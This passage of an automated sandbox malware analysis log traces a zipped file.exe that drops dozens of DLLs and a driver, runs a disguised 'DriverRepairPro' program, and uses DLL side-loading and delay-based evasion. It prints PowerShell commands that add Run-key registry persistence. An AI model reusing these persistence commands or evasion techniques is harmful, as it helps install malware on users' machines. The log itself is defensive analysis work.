Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep count: 1436 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\dxmasf.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\MouseA.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\netmsg.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\iologmsg.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\TelephonyInteractiveUserRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\secman.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\KBDURDU.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\wmploc.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\detoured64.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\System.Threading.Tasks.Extensions.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\icmp.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\PhoneServiceRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\SrEvents.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\imageres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\kbdnko.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\KBDLT.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\Microsoft-WindowsPhone-SEManagementProvider.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\SyncRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\ati2erec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\KBDIT.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\advapi32res.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\bridgeres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\asferror.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\imagesp1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\wmdrmsdk.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\microsoft-windows-processor-aggregator-events.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\KBDFA.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\tapiui.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\msafd.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\msxml6r.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\lltdres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\lz32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\msxml3r.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\MapControlStringsRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\shimeng.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\wlanutil.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\onnxruntime.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\System.Buffers.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\SensorsCpl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\KBDKYR.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\MouseA.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\KBDARME.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer64.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\mmres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\defragres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\rnr20.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\tier2punctuations.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\KBDIR.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\tzres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\msprivs.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\PhoneutilRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\msidntld.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\microsoft-windows-storage-tiering-events.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\KBDUR.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\System.Runtime.WindowsRuntime.UI.Xaml.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\moricons.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\blbres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\System.Text.Encodings.Web.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\TpmCertResources.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\secman64.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\RDCameraDriver.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\detoured32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\DMAppsRes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\ETWCoreUIComponentsResources.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\wmi.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\qedwipes.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\ACLOGGER.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\KBDARMW.DLLJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\neth.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\lpk.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\dmdskres2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\XAudio2_8.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\System.ValueTuple.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\comres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\tzsyncres.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\wmerror.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\ws2help.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDropped PE file which has not been started: C:\ProgramData\ypkiExpertDriverToolkit\dmdskres.dllJump to dropped file
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 1200000
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 600000
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 3600000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1773
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 436
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1744
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1119
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2294
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1801
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1436
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess information queried: ProcessInformation
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 40000
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 120000
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 1200000
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 600000
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 3600000
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 120000
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 60000
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeThread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\SysWOW64\wininet.dll
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.418_none_5f5edc43821bf931
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\SysWOW64\winspool.drv
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\SysWOW64\oleacc.dll
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\SysWOW64\winmm.dll
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.418_none_2e73e95e27897f63\COMCTL32.dll

HIPS / PFW / Operating System Protection Evasion

barindex
DLL side loading technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\tzres.dll
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess created: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe "C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe"
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'"
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'""
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
